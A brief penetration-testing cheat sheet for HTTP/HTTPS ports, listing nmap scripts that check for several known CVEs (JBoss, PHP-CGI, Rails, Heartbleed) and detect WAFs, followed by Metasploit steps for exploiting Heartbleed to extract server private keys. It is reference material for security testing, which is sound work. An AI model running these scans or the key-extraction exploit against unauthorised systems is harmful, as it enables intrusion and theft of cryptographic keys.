80/443 - HTTP/HTTPS

Identification and Checks

# IIS
nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-iis-webdav-vuln <IP>

# JBOSS (CVE-2010-0738)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2010-0738 <IP>

# PHP-CGI (CVE-2012-1823)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2012-1823 <IP>

# RCE Ruby on Rails (CVE-2013-0156)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2013-0156 <IP>

# WAF Detection
nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-waf-detect,http-waf-fingerprint <IP>

# Check Heartbleed CVE-2014-0160
nmap -Pn -n -p 443 -v -T3 --script=ssl-heartbleed,ssl-enum-ciphers,ssl-known-key --script-args vulns.showall -sV --version-intensity=5 <IP>


Heartbleed Exploitation (CVE-2014-0160)

# Using metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set action SCAN
...
run
   
set action KEYS
run